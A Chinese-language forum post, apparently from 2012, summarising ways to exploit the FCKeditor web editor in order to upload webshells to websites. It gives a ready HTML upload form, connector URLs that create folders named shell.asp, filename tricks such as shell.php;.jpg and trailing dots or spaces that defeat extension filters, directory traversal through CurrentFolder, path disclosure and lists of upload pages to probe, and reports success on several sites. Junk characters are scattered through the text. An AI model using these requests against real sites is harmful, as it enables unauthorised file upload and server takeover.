Fckeditor漏洞利用总结 $ J) u- n$ n; M) G- N9 `/ J
查看编辑器版本
. \; O+ U) V3 ]) T' RFCKeditor/_whatsnew.html# _3 _" [7 P8 v6 t: }, a# i, i7 E- G
—————————————————————————————————————————————————————————————+ B0 L. z& U' a" n& c* G6 x
. V+ ~, F& K" T J; {& j2. Version 2.2 版本
$ ~' l8 F. h9 EApache+linux 环境下在上传文件后面加个.突破!测试通过。
$ [; b/ B" ]- \: ]7 }, L/ k& [—————————————————————————————————————————————————————————————
" H% q: N* }/ N# p5 V; @1 T5 J0 N7 J; e
! u; d& C# J) M2 A2 U7 W; G# p1 M3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。' I/ s8 d# s/ m, ?
<form id="frmUpload" enctype="multipart/form-data". n6 G7 D% f1 ~# U5 m: h
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
. H+ O& w8 x( c6 r% L9 X, g<input type="file" name="NewFile" size="50"><br>) n7 \. [5 `3 g+ g3 O% R0 K% c( H
<input id="btnUpload" type="submit" value="Upload">0 }1 @& ?6 p1 d% Q
</form>
/ h9 ^# O- N, b4 Q& i————————————————————————————————————————————————————————————— T+ Z2 {& v/ `, x: V: u0 s, k, ?
6 e- N+ V0 M0 s/ H3 V( x/ q* m
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法: j& S4 A0 a& X' I% ^5 y3 T# N( ?
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
' O% m. k; [; \! O% _4 Q 4.1:提交shell.php+空格绕过' U3 s: `* l9 S, y& C2 Z
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。 c0 O' x4 T; F/ V* d: L8 h5 y
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
/ ?5 A3 o9 u* `" X& F. k—————————————————————————————————————————————————————————————
- P% Z3 K: L- h' H h# l. G$ Z6 e- ^
5. 突破建立文件夹% s1 s( k% ]9 X1 d6 h0 d
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
1 u. `( T7 T- y; z: |6 S. ?FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp) U1 U) A+ Y7 W/ L
—————————————————————————————————————————————————————————————
9 D; I" r5 G ?5 ^# ] b0 l8 T$ G$ y' x0 B
6. FCKeditor 中test 文件的上传地址
9 {( W. E2 O4 ^- m7 \' FFCKeditor/editor/filemanager/browser/default/connectors/test.html
4 C- n2 y9 H+ I* oFCKeditor/editor/filemanager/upload/test.html+ S G* L4 Z) {3 k
FCKeditor/editor/filemanager/connectors/test.html3 [: a/ H- F2 A0 Z' T
FCKeditor/editor/filemanager/connectors/uploadtest.html
6 e0 R9 V- B- S9 X6 n—————————————————————————————————————————————————————————————* p9 p- Q U# b1 X, k, C- l
# o; a) J; V( n0 K& Z9 m7 ~
7.常用上传地址
( X8 j, f% [; {1 r4 XFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/$ L' _% ~: }# X! o( q6 L, }
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
/ p8 Y5 |" U) HFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
0 u; q G# O0 R4 f: XJSP 版:
1 ]- Y- u8 ]6 bFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
) b- n, N! N) N7 ^3 U$ S" F注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
8 S, m, r& ?3 p$ o U5 B件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。8 k, f8 h2 i$ Y
—————————————————————————————————————————————————————————————
% s, I2 v! Z$ c% ]- Q8 H2 E1 |7 q" h* o M) P3 J
8.其他上传地址
5 u* |4 E' Y8 \. o; j# dFCKeditor/_samples/default.html
0 {) l; [6 I8 ]FCKeditor/_samples/asp/sample01.asp
/ K5 G+ B0 M. A6 B/ iFCKeditor/_samples/asp/sample02.asp
# h6 b, _5 O2 g2 z. UFCKeditor/_samples/asp/sample03.asp
+ v/ i; z% g Q, x/ |FCKeditor/_samples/asp/sample04.asp
% D' @7 N) S. h一般很多站点都已删除_samples 目录,可以试试。
) M7 Q8 s8 v2 T1 |3 O" H XFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
1 A4 F) _" f7 t+ d$ J—————————————————————————————————————————————————————————————! C* m+ [$ R; q
( c$ ~9 D2 o( c2 w9.列目录漏洞也可助找上传地址1 {1 F* q# M% ~+ X- u# \( Q: {
Version 2.4.1 测试通过* [7 g" T2 J( Y" z8 |0 J4 [
修改CurrentFolder 参数使用 ../../来进入不同的目录
8 G; Q/ M# h2 m/ O- N7 S/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
& T6 r( F! k( V, r+ F4 W/ w) a; T根据返回的XML 信息可以查看网站所有的目录。" s" }3 Q' F4 @+ d. |) M
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
1 f2 \) i0 v: y6 [: |% T也可以直接浏览盘符:
* D1 @. V3 C8 {& o. lJSP 版本:* J# U, [4 \6 G' U/ f
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
3 q8 r: J. e: T- y8 ?- ~- `! r—————————————————————————————————————————————————————————————
/ i- Q1 S, z4 p* ?
# z% x, L2 q5 [: z10.爆路径漏洞
2 V" i7 K! b2 z) X) _* Y; eFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
4 c( R/ K8 S4 [# h/ V—————————————————————————————————————————————————————————————
, U t/ j! a6 ? u- ?* q
( ` z* x! g& O J% Q11. FCKeditor 被动限制策略所导致的过滤不严问题
: d/ B+ i: X- m+ c1 S 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
" u$ R9 V f& `5 ]# R$ G脆弱描述:
# s& E+ {0 L( ~3 N8 BFCKeditor v2.4.3 中File 类别默认拒绝上传类型:3 x3 @$ i+ Y& R4 ]# d
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
; n$ G+ r4 d) F+ UFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]! ?8 D% U* K0 R/ g
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
+ }& k1 k; @& P% y0 @ 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
* W( f6 e' G% P8 n9 ?—————————————————————————————————————————————————————————————5 D: d. g H+ \% ]4 V% E9 N
, G# K- B) ~8 m' ^12.最古老的漏洞,Type文件没有限制!
% F5 f5 Z, t/ ]! Y1 j+ W 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
% l$ c- }; m! B Z! H9 S1 | c—————————————————————————————————————————————————————————————6 V$ X! a8 M" ?- l& v
( Q( e L3 l8 G9 O5 t: n- o! t
===============================================================================================================================================
7 H1 C9 U7 n: n' N' \
5 { ?8 [/ x! U, N$ D$ F# O' ^FCK编辑器jsp版本漏洞:# m9 P O; _( [( k; z
! H/ a, K, ^1 v
0 ]; e* r4 y+ t) C; Nhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
6 o" v: d/ `. ]
: @8 K5 T) m. R3 m% e( X( @( L( T上传马所在目录2 i6 e& ?0 ]) X b5 z
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/* \! X; }; C9 K& m
上传shell的地址:) m& t8 n6 t) t9 L3 b
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
) ^9 w9 |! R. Y. t6 J2 p/ ^* n跟版本有关系.并不是百分百成功. 测试成功几个站.7 Q' O3 k+ ~7 m2 F' {6 h+ f3 \
不能通杀.很遗憾.
4 e% ?4 ^0 G' U2 {' \# ?6 l4 o+ \http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
) O/ k% c/ ~: A' r$ n5 |如果以上地址不行可以试试
& ` E; G" h2 v1 e# v. z k, KFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
1 \5 d& l: F }; X* x% ]3 b1 Y tFCKeditor/_samples/
! b- X/ v7 a8 U$ u: ]FCKeditor/_samples/default.html
+ _% ~. J" \) M' g$ MFCKeditor/editor/fckeditor.htm
1 |: l8 y) z: yFCKeditor/editor/fckdialog.html
) x+ D- m! \, F* c1 P- `& v/ H& _; T" b
: c4 T4 A9 X3 u- ^0 J4 d: w) S& s
) ?) m/ i0 f! l, D9 ?8 ?# q解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
0 ?( y7 x5 s$ U' i; V |
发表于 2012-9-13 17:01:39
收藏
支持
反对